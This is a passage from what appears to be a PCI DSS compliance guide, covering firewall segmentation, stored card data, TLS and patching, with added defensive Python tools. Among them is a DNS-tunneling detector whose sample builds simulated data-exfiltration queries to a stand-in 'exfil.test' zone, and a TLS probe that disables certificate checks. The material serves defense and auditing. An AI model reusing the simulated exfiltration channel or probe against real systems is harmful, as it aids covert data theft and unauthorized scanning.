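def review(lines, now, critical_hosts, fail_threshold=5,
           window=timedelta(minutes=5), heartbeat_timeout=timedelta(minutes=10)):
    """Return alerts for (a) repeated auth failures from one source inside `window`
    (10.4.1.1-style automated review) and (b) a critical control whose last
    heartbeat is older than `heartbeat_timeout` as of `now` (10.7.2)."""
    failures = defaultdict(list)      # source IP -> failure timestamps
    last_heartbeat = {}               # host -> last heartbeat timestamp
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, msg = parsed
        if msg == "heartbeat ok":
            last_heartbeat[host] = ts
        m = FAIL_RE.search(msg)
        if m:
            failures[m.group(2)].append(ts)

    alerts = []
    for ip, times in failures.items():
        times.sort()
        # Sliding window: from each failure, count the ones that fall inside the window
        for i, start in enumerate(times):
            count = sum(1 for t in times[i:] if t - start <= window)
            if count >= fail_threshold:
                alerts.append({"type": "brute_force", "source": ip, "count": count})
                break
    for host in critical_hosts:
        seen = last_heartbeat.get(host)
        if seen is None or now - seen > heartbeat_timeout:
            alerts.append({"type": "control_failure", "host": host, "last_seen": seen})
    return alerts

def review_sample(now="2025-03-01T10:20:00Z"):
    """Run the review over the constructed log with fw01 and ids01 as critical controls."""
    return review(SAMPLE_LOG.splitlines(), parse_ts(now), critical_hosts=("fw01", "ids01"))

if __name__ == "__main__":
    for alert in review_sample():
        print(alert)
```

The heartbeat check is the part most teams forget: a firewall that silently stops logging looks exactly like a quiet network unless something is expecting its messages, so the detection has to be driven by absence, not by an error event.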
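For 11.5.1.1 above, this added example (not the guide's or any vendor's code) shows a heuristic DNS-tunneling detector of the kind an IDS/IPS applies: it groups queries by client and parent zone, and flags a pair when the client asks for many distinct subdomains that are long and high-entropy, which is what encoded data smuggled out in query names looks like. The query log is constructed (the "exfiltrated" labels are hex digests), and the thresholds are assumptions to be tuned on your own baseline.

```python
import hashlib
import math
from collections import defaultdict

def shannon_entropy(s):
    """Bits of entropy per character of s (0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def split_name(qname, zone_levels=2):
    """'abc.def.example.test' -> ('abc.def', 'example.test')"""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-zone_levels]), ".".join(labels[-zone_levels:])

def detect_tunnels(queries, min_unique=20, min_avg_len=30, min_entropy=3.0, zone_levels=2):
    """queries: iterable of (client_ip, qname, qtype). Returns one finding per
    (client, zone) whose subdomain population looks like an encoded data channel."""
    subs_by_key = defaultdict(set)
    qtypes_by_key = defaultdict(lambda: defaultdict(int))
    for client, qname, qtype in queries:
        sub, zone = split_name(qname, zone_levels)
        if not sub:                      # bare zone lookups carry no payload
            continue
        key = (client, zone)
        subs_by_key[key].add(sub)
        qtypes_by_key[key][qtype] += 1

    findings = []
    for (client, zone), subs in subs_by_key.items():
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if len(subs) >= min_unique and avg_len >= min_avg_len and avg_ent >= min_entropy:
            findings.append({"client": client, "zone": zone,
                             "unique_subdomains": len(subs),
                             "avg_label_len": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2),
                             "qtypes": dict(qtypes_by_key[(client, zone)])})
    return findings

def sample_queries():
    """Constructed query log: ordinary browsing from 10.0.0.5 and a tunnel from 10.0.0.9
    to the assumed attacker zone exfil.test, 40 TXT queries carrying 50 hex chars each."""
    benign = [("10.0.0.5", name, "A") for name in
              ("www.example.test", "mail.example.test", "cdn.example.test", "api.example.test")] * 10
    tunnel = []
    for i in range(40):
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:50]
        tunnel.append(("10.0.0.9", f"{chunk[:30]}.{chunk[30:]}.exfil.test", "TXT"))
    return benign + tunnel

if __name__ == "__main__":
    for finding in detect_tunnels(sample_queries()):
        print(finding)
```

The three signals are deliberately combined: CDNs and anti-spam services also generate many unique subdomains, but theirs are short or low-entropy, so requiring all three keeps the false-positive rate workable. The qtype mix in the finding is there because tunnels lean on TXT, NULL or CNAME records to get data back in.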
TAKEAWAYS

First, read the PCI DSS version 4.0 standard and get familiar with the bigger changes that could impact your compliance process. Then start formulating your plans right now to implement changes for version 4.0. There is plenty of time, so start early and you will not have problems making the transition. During this planning process don't forget to keep working hard to keep your current efforts going to be compliant to PCI DSS version 3.2.1.

Second, start thinking about how you are conducting your risk assessments. More formal risk assessment processes are required in version 4.0 and most organizations will have to add processes and gain skills to do this correctly. Start researching formal risk assessments and refer to the industry standards out there like NIST SP 800-30 and OCTAVE to begin getting familiar with them. It may be a good idea to consult with a QSA as you develop these processes.

Finally, don't wait until 2024 to begin switching over to PCI DSS 4.0. Spread your efforts across the next couple of years and you will be just fine with the new requirements.

PCI DSS 4.0 SUMMARY

As a reminder, PCI DSS version 4.0 may seem daunting, but it is actually an improved way to counteract the techniques used by threat actors. Preparing for compliance to version 4.0 is straightforward if you are already working towards or maintaining compliance to PCI DSS 3.2.1.
Implementing a
PCI Compliant Remote
Workforce Setup
It is increasingly common for companies to allow employees to work
from home. It is important to remember that if cardholder data is
processed, transmitted, or stored by employees working from home,
their home environment will be part of the organization’s PCI scope.
Guide to PCI DSS Compliance | Introduction | 35
THE SCOPE OF THE REMOTE WORK CDE

When scoping a work-from-home implementation where employees will be collecting or processing cardholder data, begin by mapping out the flow of cardholder data.

Questions to answer:

• How is data being received by the employees (e.g., over the phone, fax, Internet communications)?
• Once this data is received, how are employees processing the data?
• What devices and network segments are involved in the transmission of cardholder data?
• Is cardholder data being stored electronically or on paper?
• What type of voice communication channels are involved?
• If cardholder data is received over the phone, are calls being recorded?

EXTENDING THE EXISTING CDE

Many organizations will already have an existing CDE with mature controls designed to protect customer data. When implementing a work-from-home scenario, attempt to leverage the tools and security controls that exist in the corporate environment.

Assume that the employee's home network and computer are not a secure option for processing payments. You can maintain the security stance of your CDE by extending your CDE network via VPN connectivity and providing company-owned mobile devices that have been hardened and can be managed remotely. Also, keep in mind that split tunneling should be disabled in order to maintain proper network segmentation: with split tunneling enabled, the device sits on the home network and in the CDE at the same time, which defeats the segmentation the VPN was meant to preserve.

Most enterprise phone deployments have moved to Voice over IP (VoIP). VoIP offers great flexibility that can also be leveraged in a work-from-home scenario. If your CDE includes telephone-order options, send VoIP endpoints home with your employees that will extend your VoIP system over an encrypted connection (such as a VPN).

For more information on protecting voice communications, see the PCI SSC's guidance on Protecting Telephone-based Payment Card Data.8
Forensic Perspective

INTRODUCTION

ECOMMERCE SECURITY TRENDS

Findings From SecurityMetrics' Ecommerce Security Service

68.3% of discovered issues were suspicious.

92.4% of Shopping Cart Inspect reviews identified malicious, suspicious, and/or concerning issues on researched ecommerce sites.
1. Configuration Vulnerability
A configuration item with a website or web server is not following best security practices.

2. Malicious Post
A script is running with a post of data to a known bad site.

3. Malicious JavaScript
JavaScript appears to be acting in a malicious manner, such as harvesting credit cards or other sensitive data.

4. Form Jacking
An authorized payment web form is being replaced by a counterfeit.

1. JavaScript Issue
Out-of-date JavaScript can lead to vulnerabilities available for future malicious attacks.

2. Ads/Business Intelligence
Advertising/analytics content is being pulled into the pages being reviewed in the checkout environment. This can be a source of intermittent card/data loss due to drive-by malvertising.

3. Mixed HTTP/HTTPS
Content called via HTTP in an HTTPS environment, breaking strict SSL/TLS protocol. In severe cases, this can be exploited by bad actors to view privileged content.

4. Configuration Issue
Missing required web server security headers.

5. SPAM Watch
A domain has been flagged by the SPAM community, which could mean bad actors are using the email server to transmit malicious communications.
Forensic Predictions

PREDICTION 1
INCREASED PHISHING SOPHISTICATION

Last year, a major company was breached about every week, let alone the numerous cases of small businesses falling for phishing. Some of these breaches even came from teenagers tricking these large organizations by utilizing sophisticated phishing attacks.

For example, one recent phishing example we've seen become more relevant is phishing emails sending requests through electronic signature tools. Once you click on what you believe is a form to fill out or sign, you are taken to a blank image. That blank image has malware embedded into it, enabling malicious attackers to gain control of the network.

Another trend that's increased is SMS phishing or smishing. This is where your text messages are being used against you, with attackers trying to get access to automatic two-factor authentication codes that come up in text messages. But if your phone has been compromised via one of these previous methods, attackers will be able to access the code before you do.
PREDICTION 2

You also have incoming messages being displayed regardless of the content on the mobile phones.

You need to focus on cybersecurity due diligence and your user security awareness because even with all the technical controls in place, these phones can be an easy gateway into your business security. Previously, these mobile browsers were put in a sandbox, with it being difficult for third party coding to be injected into these sandboxed apps.

But now with web view, these attackers will continue to target the web view browser.

We recommend that if you don't need an app on your phone, get rid of it. If you do keep an app on your phone, you need to update it regularly.

PREDICTION 3

Beyond backdoor vulnerabilities and active former DevOps accounts and credentials, third parties or contractors open up security vulnerabilities to organizations. For example, impersonation attacks that compromise dev tools and code libraries will continue to be a huge security issue, such as with clipper malware, which hijacks a user's clipboard data.
Requirement 1

PERIMETER FIREWALLS

A properly configured business-grade perimeter firewall acts as the first line of defense and blocks unwanted network access. While these are often physical devices, they can be offered as services in cloud environments, where they are often referred to as network security groups.

A firewall is typically installed at the perimeter of an organization's network to protect internal networks from untrusted networks, such as the Internet, often by restricting the types of network traffic permitted into the organization's network and the locations from where the traffic originates. Perimeter firewalls can also be used inside an environment to create isolated network segments. Higher security internal network segments are created to limit access to sensitive data from less secure networks.

PERIMETER FIREWALL PROS

• Most robust security option
• Protects an entire network
• Can segment internal parts of a network

PERIMETER FIREWALL CONS

• Rules need to be carefully documented
• Difficult to configure properly
• Needs to be maintained and reviewed regularly

Many personal computers come with pre-installed software firewalls. This feature must be enabled and configured for any laptop computers that commonly connect to sensitive data networks and are also used to connect to the Internet when outside the network.

Personal firewalls protect the system they are on, while perimeter firewalls protect entire networks. A personal firewall can be configured to permit more or less network traffic, depending on the network to which it is attached. For example, it might allow more types of network traffic when the machine is on the company network, but limit it when on public Wi-Fi.

A common mistake regarding firewalls is assuming they are a plug-and-play technology. After initial installation, additional effort is almost always necessary to restrict access and protect the CDE.

The end goal of firewall implementation is to prevent potentially harmful traffic from the Internet and other untrusted networks from accessing valuable confidential data, and to prevent data from being exfiltrated by malicious actors. In ecommerce applications, a firewall should be used to limit traffic to essential services needed for a functioning CDE. By identifying sensitive systems and isolating them through the proper use of firewalls (e.g., network segmentation), merchants can more precisely control what type of access is allowed in and out of these zones, and more easily protect payment data.
FIREWALL CONFIGURATION BEST PRACTICES

NETWORK SEGMENTATION

Merchants often set up flat networks, meaning everything inside the network can connect to everything else. They may have one firewall at the edge of their network, but that's it. There's no internal segmentation, making it a flat network.

Flat networks make security difficult because if an attacker gets inside, they have access to everything.

Initial intrusion in many recently investigated data breaches began in areas of an organization's network that shouldn't have given the attacker access to the CDE. For example, since the organization's network was configured as a flat network, it was not difficult for the attacker(s) to migrate from the point of entry (e.g., employee laptop, workstation) to the CDE or other sensitive systems.

For example, install and configure a multi-interface firewall at the edge of your network. From there, create one interface on the firewall dedicated just to the systems that store, process, and transmit cardholder data. If that interface doesn't allow any other traffic in or out of any out-of-scope zones, this is proper network segmentation.

Segmentation is not required for you to be compliant with PCI DSS. However, if you're looking for a way to reduce the cost, effort, and time of compliance by shrinking the number of systems in scope, you may want to consider segmentation.

Segmentation can be tricky, especially for those without a technical security background. Consider having a security professional double-check your segmentation work by performing regular, third-party segmentation checks.
TEST AND MONITOR CONFIGURATION

Rules and environments change over time, no matter the size of your organization. Firewall rules should be reviewed (and revised when necessary) whenever your environment undergoes a significant change and at least every six months.

[Figure: Segmented Network Example. Internet, firewall, web portal application, database cluster, SMTP, and workstations separated into VLAN 1 through VLAN 4.]
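The six-monthly rule review above is where flat-network mistakes get caught, so here is an added example (not from the guide) of a review script that flags the usual ones: rules that let an out-of-scope zone reach the CDE, any/any rules, rules with no documented justification, CDE egress that is not on an approved list, and a policy that does not end in an explicit default deny. The rule shape and zone names are assumptions; a real firewall needs an exporter from its CLI or API into this form.

```python
# Constructed rule set in an assumed normalized shape. Zones: internet, dmz, cde, workstations.
RULES = [
    {"id": 10, "src": "internet", "dst": "dmz", "port": "443", "action": "allow",
     "justification": "Public checkout web tier"},
    {"id": 20, "src": "dmz", "dst": "cde", "port": "5432", "action": "allow",
     "justification": "Web tier to card database"},
    {"id": 30, "src": "workstations", "dst": "cde", "port": "3389", "action": "allow",
     "justification": "Admin RDP"},
    {"id": 40, "src": "workstations", "dst": "any", "port": "any", "action": "allow",
     "justification": ""},
    {"id": 50, "src": "cde", "dst": "internet", "port": "443", "action": "allow",
     "justification": "Outbound to payment processor API"},
    {"id": 60, "src": "any", "dst": "any", "port": "any", "action": "deny",
     "justification": "Default deny"},
]

def reaches(zone, targets):
    """True if a rule's zone field ('any' or a zone name) can touch any of `targets`."""
    return zone == "any" or zone in targets

def review_rules(rules, cde_zones=frozenset({"cde"}),
                 approved_inbound=frozenset({("dmz", "cde", "5432")}),
                 approved_outbound=frozenset({("cde", "internet", "443")})):
    """Return a list of findings; an empty list means the policy passed every check."""
    findings = []
    for r in rules:
        if r["action"] != "allow":
            continue
        triple = (r["src"], r["dst"], r["port"])
        if not r["justification"].strip():
            findings.append({"rule": r["id"], "issue": "undocumented"})
        if "any" in triple:
            findings.append({"rule": r["id"], "issue": "overly_permissive"})
        # A path into the CDE from outside it that is not on the approved list
        if reaches(r["dst"], cde_zones) and not reaches(r["src"], cde_zones) \
                and triple not in approved_inbound:
            findings.append({"rule": r["id"], "issue": "unapproved_path_into_cde"})
        # CDE systems talking out to the Internet is an exfiltration path unless approved
        if reaches(r["src"], cde_zones) and r["dst"] in ("internet", "any") \
                and triple not in approved_outbound:
            findings.append({"rule": r["id"], "issue": "unapproved_cde_egress"})
    last = rules[-1] if rules else None
    if not (last and last["action"] == "deny"
            and (last["src"], last["dst"], last["port"]) == ("any", "any", "any")):
        findings.append({"rule": None, "issue": "no_explicit_default_deny"})
    return findings

if __name__ == "__main__":
    for finding in review_rules(RULES):
        print(finding)
```

Rule 40 is the classic flat-network rule: one line with "any" in it quietly gives every workstation a route to the card database, which is why it collects three findings at once. The approved lists are the documented business justifications PCI DSS expects for each permitted flow; anything not on them is a question for the rule's owner, not an automatic exception.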
REQUIREMENT 1 IT CHECKLIST

• Firewall(s)
Requirement 2

Apply Secure Configurations to All System Components

Out-of-the-box devices, such as routers or POS systems, often come with factory settings like default usernames and passwords. Defaults make device installation and support easier, but they also mean every model originates with the same username and password. Default passwords are easy to guess, and many are published online.

Passwords that fall short of these criteria can usually be broken in a short time using readily available password-cracking tools.

SYSTEM HARDENING
This way, applications and systems that are not approved for use in the CDE can be discovered and addressed.
TIPS FROM AN AUDITOR

Requirement 2: System Configuration

• Changing default passwords
• Limiting servers to perform a single role
• Removing or disabling default accounts

Automated tools can simplify the task of enforcing configuration standards, allowing administrators to quickly discover systems that are out of compliance.
REQUIREMENT 2 IT CHECKLIST

• Configuration Standards
Requirement 3

Protect Stored Account Data

DATA RESIDES

According to Requirement 3, stored card data must be rendered unreadable, for example by encrypting it with industry-accepted algorithms (e.g., AES-256). The problem is that many organizations unknowingly store unencrypted primary account numbers (PAN), which typically happens because of misconfigured software.

Not only must card data be encrypted, but the encryption keys must also be protected. Not protecting the encryption key location using a solid PCI DSS encryption key management process is like storing your house key in your front door lock.

An essential part of eliminating stored card data is using a valid card data discovery tool and methodology. These tools help identify the location of an unencrypted PAN, so you can securely delete or encrypt it. They also help identify which processes or flows might need to be fixed.

Remember, payment card data can easily leak due to poor processes or misconfigured software. Start by looking where you think the data is, and then look where it shouldn't be.
2023 PANSCAN® DATA ANALYSIS

Storage of unencrypted payment card data increases an organization's risk and liability in the event of a data breach.

• +3.7 million primary account numbers found
• 86% of PANscan® users discovered unencrypted PAN data
• 5% stored track data (i.e., data inside the magnetic stripe)
To accurately craft your CHD flow diagram, ask yourself:

• What device(s) am I using for transactions? A virtual terminal? POS system?
• What happens to the card data after a transaction?
• When is data encrypted? Is it even encrypted at all?
• Do I store card data before it's sent to the processor for approval?
• How does settlement occur? Does settlement occur in real time or at the end of the day?
• How is data authorized and returned by the processor?
• Is card data backed up on my system? Are backups encrypted? Is the backup server at a different data location?
• Where might card data be going or moved in processes not part of authorization and settlement?
Requirement 3: Protect Cardholder Data

The more data you keep, the higher the risk.

BEN CHRISTENSEN
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA

Don't keep any data you don't need. If you only need the last four numbers of PAN, get rid of the rest! For each element of cardholder data, ask yourself if you really need it or if it is just nice to have. I have found that some companies have a lot of data they really don't need and never ask if the business needs it. The more data you keep, the higher the risk.

IT should work closely with all business groups to decide what data the company needs, where to store it, and for how long. Data retention policies are key to ensuring that your data has the appropriate controls. Periodic assessments of data retention and data mappings should be performed. Data requirements might change over time, so check often.

It is important to know what data you actually store, process, and/or transmit. If you don't know what you have, it is difficult to implement the correct controls around it. Data flow mapping helps you understand the data coming into and out of your organization. Create data flow diagrams for your entire organization (on all information you deem sensitive), not just for your CDE environments. You might miss something if you only focus on the CDE and CHD.

In addition, use automated tools that can help you search for and find unencrypted CHD. You will be surprised by what you find outside of your CDE. Run these tools often to ensure data is where it should be.

PCI DSS v4.0 Considerations for Requirement 3

As noted above in the PCI DSS v4.0 summary, Requirement 3 has a lot of changes. Make sure you understand what elements of cardholder data you are storing and what that means for 4.0. There are some changes to the encryption requirements in 2025. These changes could take a lot of effort, so start now.

Also, review your algorithms and hashing functions, as those may be impacted when moving to PCI DSS v4.0.
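The card data discovery pass that Requirement 3 relies on, and that 12.10.7 in the v4.0 changes turns into an incident-response trigger, is shown here as an added example (not the guide's tool or PANscan): it finds 13- to 19-digit runs, allowing the spaces and dashes people type, keeps only Luhn-valid ones so tracking and order numbers drop out, and reports each hit masked to the first six and last four digits with its file and line. The sample files are constructed and the numbers are the industry's published test PANs, not real cards.

```python
import re

# Candidate: 13-19 digits, optionally separated by single spaces or dashes,
# not embedded in a longer digit run.
CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

def luhn_ok(digits):
    """Luhn check (ISO/IEC 7812); rejects most non-card digit runs such as tracking numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def brand_hint(digits):
    """Coarse issuer hint from the leading digits (enough to triage a hit, not authoritative)."""
    if digits[0] == "4":
        return "visa"
    if digits[:2] in ("34", "37"):
        return "amex"
    if "51" <= digits[:2] <= "55":
        return "mastercard"
    return "unknown"

def mask(digits):
    """Display form permitted for PAN: first six and last four digits only."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]

def find_pans(text, source="<memory>"):
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CANDIDATE_RE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group())
            # Luhn plus a guard against repeated-digit runs (a string of zeros passes Luhn)
            if luhn_ok(digits) and len(set(digits)) > 1:
                hits.append({"source": source, "line": lineno,
                             "masked": mask(digits), "brand_hint": brand_hint(digits)})
    return hits

def scan_files(files):
    """files: {path: text}. Returns every Luhn-valid PAN-shaped hit, masked, with its location."""
    hits = []
    for path, text in files.items():
        hits.extend(find_pans(text, source=path))
    return hits

# Constructed sample corpus: an export that should never have held full PAN, an application
# log with a look-alike tracking number, and a support ticket with a PAN pasted into free text.
SAMPLE_FILES = {
    "exports/orders-2025-02.csv": (
        "order,card\n"
        "1001,4111 1111 1111 1111\n"         # Visa test PAN, Luhn-valid
        "1002,5555-5555-5555-4444\n"         # Mastercard test PAN, Luhn-valid
        "1003,4111111111111112\n"            # fails Luhn: ignored
    ),
    "logs/app.log": "2025-02-03 order 1004 shipped, tracking 1234567890123456789\n",  # 19 digits, not Luhn-valid
    "support/ticket.txt": "customer says 378282246310005 was declined twice\n",        # Amex test PAN
}

if __name__ == "__main__":
    for hit in scan_files(SAMPLE_FILES):
        print(hit)
```

The tool never writes a full PAN to its own output, because a discovery report that contains clear-text PAN is itself a new unencrypted store. The Luhn filter is what keeps a scan of logs and exports usable; without it every invoice, tracking and phone number of the right length becomes a hit.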
REQUIREMENT 3 IT CHECKLIST
Requirement 4

Protect Cardholder Data with Strong Cryptography During Transmission Over Open, Public Networks

For Requirement 4, you need to identify where you send cardholder data. The following are common places primary account numbers (PAN) are sent:

• Processors
• Backup servers
• Third parties that store or handle PAN
• Outsourced management of systems or infrastructure
• Corporate offices

You need to use encryption and have security policies in place when you transmit cardholder data over open, public networks.

Your systems may still be using SSL and early TLS, so you should contact your terminal providers, gateways, service providers, vendors, and acquiring banks to determine if the applications and devices you use have this encryption protocol.

Examples of applications that might still use SSL/early TLS include:

• POS/POI hardware terminals
• Virtual payment terminals
• Back-office servers
• Web/application servers

The PCI Council believes that SSL and early TLS will no longer protect cardholder data.
Requirement 4: Sending Data Over Open And Public Networks

Leverage tools that can analyze web services and report any insecure setups.

BEN CHRISTENSEN
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA

Build off of the data flow diagrams discussed in the tips in Requirement 3.3 Know exactly where CHD is coming from and being sent to, inside and outside of your organization. Make sure your CHD is encrypted when transmitted over open public networks using strong and industry-accepted encryption technologies.

Are you using strong encryption on all CDE-impacting services? I have noticed that some companies are still using older technologies even though the latest is also supported. For example, CDE web servers using TLS 1.3 or TLS 1.2 are still accepting connections using TLS 1.1. Disable all insecure protocols and encryption.

Companies should also leverage tools that can analyze web services and report any insecure setups. You may not be aware of all your services accessible over the internet. Run these tools often to help ensure you are using acceptable protocols and encryption strengths.

PCI DSS v4.0 Considerations for Requirement 4

Some organizations may have a large number of TLS certificates. Start inventorying those now and remove those certs not needed. 2025 seems far off, but it will come quickly. Don't wait.
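The "still accepting TLS 1.1" problem above is easy to check for yourself. This added example (not the guide's or any vendor's tool) has two halves: a server-side ssl context hardened so that SSL 3.0, TLS 1.0 and TLS 1.1 are refused along with weak ciphers and compression, and a client-side probe that pins a handshake to one protocol version at a time and reports which versions a live server still accepts. The probe needs network access and a target host of your own (the name in the main block is an assumption); the context builder and the assessment logic run offline.

```python
import socket
import ssl

# Versions PCI DSS no longer treats as strong cryptography, and the order the probe tries.
LEGACY = ("TLSv1", "TLSv1_1")
PROBE_ORDER = ("TLSv1", "TLSv1_1", "TLSv1_2", "TLSv1_3")

def hardened_server_context(certfile=None, keyfile=None):
    """Server context that refuses anything below TLS 1.2, NULL/MD5/RC4/3DES suites and
    TLS compression. Loads a certificate only when PEM paths are supplied (assumed files)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5:!RC4:!3DES")
    ctx.options |= ssl.OP_NO_COMPRESSION
    if certfile:
        ctx.load_cert_chain(certfile, keyfile)
    return ctx

def accepts_legacy(ctx):
    """True if a context would still negotiate a pre-TLS 1.2 protocol."""
    return ctx.minimum_version < ssl.TLSVersion.TLSv1_2

def probe_version(host, port, version_name, timeout=5.0):
    """Handshake pinned to one version. Returns 'accepted', 'rejected',
    'client_unsupported' (this OpenSSL build cannot offer it) or 'unreachable'."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # testing protocol support, not the certificate
    version = getattr(ssl.TLSVersion, version_name)
    try:
        ctx.minimum_version = version
        ctx.maximum_version = version
        if version_name in LEGACY:
            # Drop OpenSSL's security level so the client's own policy does not mask the server's answer
            ctx.set_ciphers("ALL:@SECLEVEL=0")
    except (ValueError, ssl.SSLError):
        return "client_unsupported"
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return "accepted" if tls.version() else "rejected"
    except ssl.SSLError:
        return "rejected"
    except OSError:
        return "unreachable"

def probe(host, port=443):
    return {v: probe_version(host, port, v) for v in PROBE_ORDER}

def assess(results):
    """Legacy versions the server still accepted; an empty list is the passing result."""
    return [v for v in LEGACY if results.get(v) == "accepted"]

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "www.example.com"   # assumed target
    results = probe(target)
    print(results)
    print("legacy protocols still accepted:", assess(results) or "none")
```

Run the probe against every CDE-facing endpoint, not just the main web site; the terminals, gateways and back-office services listed above are where old protocol support lingers. A "client_unsupported" result means your scanning host cannot speak that version at all, so it proves nothing about the server and the check has to be repeated from a host that can.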
REQUIREMENT 4 IT CHECKLIST

Transmitting Cardholder Data

Things You Will Need To Do:

• Check all related device configuration for proper encryption. Check with vendors to make sure supplied POS/POI devices are encrypting data appropriately.
• Validate that POS/POI devices are not susceptible to any known exploits. Devices and software used to process credit cards need to be PCI DSS compliant.
Requirement 5

Protect All Systems and Networks from Malicious Software

Requirement 5: Implement And Update Your Anti-Malware

System administrators are responsible for making sure that their anti-malware software is up to date.

MICHAEL OHRAN
CISSP | CISA | QSA | SSF | SSL

System administrators have the responsibility of making sure their anti-malware software, including the signatures, is up to date.

After a software upgrade, verify that signatures are able to be updated. The new software may use different firewall rules or directory permissions, requiring some system configuration changes to ensure signature updates continue.

PCI DSS requires anti-malware software to be installed on all systems that are commonly affected by malware (e.g., Windows). While Linux servers are often considered systems not commonly affected by malware, it's highly recommended that anti-malware software be installed for any Internet-facing Linux servers.

PCI DSS v4.0 Considerations for Requirement 5

In PCI DSS v4.0, Requirement 5 is broadened by using the term anti-malware instead of anti-virus. Most solutions have already expanded past simply protecting against "viruses," but it might be time for a more comprehensive solution.

Several new requirements were added. Though not enforced until April 2025, start implementing them sooner. Finding the appropriate solution to help against phishing attacks will be interesting, and will not necessarily be inside the CDE.
REQUIREMENT 5 IT CHECKLIST

• Anti-Malware Updates
Requirement 6

Application developers will never be perfect, which is why updates to patch security holes are frequently released. Once a threat actor knows they can get through a security hole, they pass that knowledge to other criminals who could then exploit this weakness until a patch has been deployed.

Quickly implementing security updates is crucial to your security posture. Patch all critical components in the card flow pathway, including:

• Internet browsers
• Firewalls
• Application software
• Databases
• POS terminals
• Operating systems

Older Windows systems can make it difficult for merchants to remain secure, especially when the manufacturer no longer supports a particular operating system or version (e.g., Windows 7, Windows Server 2008 R2).

Operating system updates often contain essential security enhancements that are specifically intended to correct recently exposed vulnerabilities. When using an unsupported OS that doesn't receive such updates and patches, the number of known but unpatched vulnerabilities on it only grows over time.

Be vigilant about consistently updating software associated with your system. Requirement 6 details that organizations must "install critical patches within a month of release" to maintain compliance.3 Don't forget about critical software installations like credit card payment applications and mobile devices. To stay up to date, ask your software vendors to put you on their patch and upgrade notification list.

Keep in mind that the more systems, computers, and apps your company has, the more vulnerabilities it may be exposed to.

Another way to stay on top of vulnerabilities is through vulnerability scanning, which is arguably the easiest way to discover the unpatched software holes that cyber criminals would use to exploit, gain access to, and compromise an organization.
ESTABLISH SOFTWARE DEVELOPMENT PROCESSES

If you develop payment applications in house (e.g., ecommerce websites, POS applications), you must use strict development processes and secure coding guidelines as outlined in the PCI DSS.

Don't forget to develop and test applications according to industry accepted standards like the Open Web Application Security Project (OWASP).

Be vigilant about consistently updating the software associated with your system.

WEB APPLICATION FIREWALL PROS

• Immediate response to web application security flaws
• Protection for third-party modules used in web applications
• Deployed as reverse proxies

WEB APPLICATION FIREWALL CONS

• Requires more effort to set up
• Possibly break critical business functions (if not careful)
• May require some network re-configuration

Requirement 6: System Updating And Software Development
Companies need to embrace the idea of change control for their software development and system patching/updating. There are four requirements detailed by the PCI Council of what a proper change control procedure must contain:

1. Changes must have a documented explanation of what will be impacted by the change.
2. Changes must have documented approval by authorized parties.
3. Changes to an organization's production environment must undergo proper iterations of testing and QA before being released into production.
4. Change control procedures must always include a back-out or roll-back procedure in case the updates go awry.

When developing software (e.g., web applications), it's crucial that organizations adopt industry-accepted standards or best practices for coding, such as OWASP. This will guide them in enforcing secure coding practices in their application development process and keep software code safe from malicious vulnerabilities (e.g., cross-site scripting, SQL injection, insecure communications, CSRF).

Insecure communications, for example, have been in the spotlight since SSL and TLS 1.0 are no longer considered acceptable protocols when data is being transmitted over open, public networks. Everyone should be on TLS 1.2+ now.

PCI DSS v4.0 Considerations for Requirement 6

Requirements have been moved around and grouped together where they are related.

New requirements have been added, notably that all scripts loaded onto the payment page of the consumer's browser must be managed. New solutions and services are being developed to assist with

Also, a web application firewall is no longer optional.
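The payment-page script management just described (6.4.3 in the v4.0 changes) and the tamper detection that goes with it (11.6.1) come down to one mechanism: know every script the page loads, and notice when that set changes. This added example (not the guide's or any product's code) parses a page's script elements, identifies external scripts by their src and inline scripts by a hash of their normalized body, and diffs the result against an authorized inventory; it also flags external scripts that carry no Subresource Integrity attribute, since their integrity cannot be validated at all. The two pages are constructed: the second is the first after a typical skimming change.

```python
import hashlib
import re
from html.parser import HTMLParser

class ScriptCollector(HTMLParser):
    """Collects every <script> on a page: its src and integrity attributes, or its inline body."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None

def fingerprint(html):
    """Map each script to an inventory id: external scripts by src, inline scripts by a hash of
    their whitespace-normalized body. The value is the SRI integrity attribute, or None."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    entries = {}
    for s in p.scripts:
        if s["src"]:
            entries["src:" + s["src"]] = s["integrity"]
        else:
            body = re.sub(r"\s+", " ", s["body"]).strip()
            entries["inline:" + hashlib.sha256(body.encode()).hexdigest()[:16]] = None
    return entries

def check_page(html, authorized):
    """Diff a fetched page against the authorized inventory (a set of inventory ids).
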